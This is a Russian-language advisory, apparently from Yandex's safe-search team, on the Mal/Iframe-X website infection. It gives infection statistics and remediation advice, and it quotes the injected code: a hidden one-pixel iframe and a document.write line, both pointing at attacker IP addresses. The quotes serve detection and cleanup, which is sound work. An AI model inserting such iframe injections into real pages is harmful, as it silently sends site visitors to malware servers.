В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Динамика числа уникальных хостов, заражённых данным вредоносным кодом, выглядит так:
Признаком заражения страницы Mal/Iframe-X является обнаружение в DOM тега IFRAME, в который загружается браузерный вредоносный код. Примерно в 75% случаев это происходит при прописывании этого тега непосредственно в HTML-коде страницы, в оставшихся 25% – при выполнении в контексте браузера специального JavaScript-файла, который дописывает тег в код страницы.
- Пример вредоносного кода в HTML-страницах:
<iframe frameborder=0 src="http://64.247.185.149/Home/index.php" width=1 height=1 scrolling=no> - Пример вредоносного кода в JavaScript-файлах:
document.write('<iframe frameborder=0 src="http://65.75.160.235/Home/index.php" width=1 height=1 scrolling=no>) - В атрибуте SRC вредоносного IFRAME практически всегда содержится URL вида:
http://IP_ADDRESS/Home/index.php
Как видно из графика ниже, особой популярностью у злоумышленников, распространяющих код Mal/Iframe-X, пользуются сайты в доменной зоне COM. Доли доменных зон выглядят следующим образом:
Для распространения основной части вредоносного кода злоумышленники используют серверы с различными IP-адресами, но примерно в четверти случаев это IP-адрес 64.247.185.149&. Доли серверов злоумышленников, которые участвуют в заражении, выглядят следующим образом:
Упрощённая схема работы Mal/Iframe-X выглядит так:
Рекомендации
Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода. Если вы не знаете, является ли ваш сайт источником распространения вредоносного кода, или о сайте известно, что он заражён, но непонятно, что это за вредоносный код и как от него избавиться – вы можете зарегистрироваться на сервисе Яндекс.Вебмастер, с помощью которого можно посмотреть детальную информацию о заражении, рекомендации по его лечению, а также запустить внеочередную перепроверку сайта.
Дополнительная информация о том, как обезопасить сайт и компьютер в интернете, содержится в статьях:
- Как удалить вредоносный код на стороне сервера;
- Как обезопасить свой компьютер при работе в интернете;
- Бесплатные антивирусы и утилиты для лечения компьютера.
Чем больше у нас примеров вредоносного кода – тем лучше мы его находим. Поэтому если вы найдёте вредоносный код на своём веб-сервере или рабочей станции – присылайте его, пожалуйста, нам для анализа по адресу virus-samples@yandex-team.ru. Как это сделать – описано в статье Как отправить вредоносный код специалистам Яндекса на анализ.
Команда безопасного поиска Яндекса